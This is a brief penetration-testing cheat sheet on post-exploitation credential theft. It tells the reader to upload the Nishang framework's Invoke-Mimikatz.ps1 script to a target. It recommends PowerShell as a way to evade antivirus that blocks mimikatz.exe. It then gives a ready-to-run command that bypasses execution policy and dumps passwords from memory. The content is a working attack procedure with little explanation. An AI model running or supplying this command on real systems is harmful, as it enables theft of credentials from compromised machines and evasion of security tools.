Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using Powershell we can bypass AVs easier than using mimikatz.exe which normally is blocked from AVs.

* Upload Invoke-Mimikatz.ps1 (part of Nishang Framework) to your target.

* Execute remotely:

powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"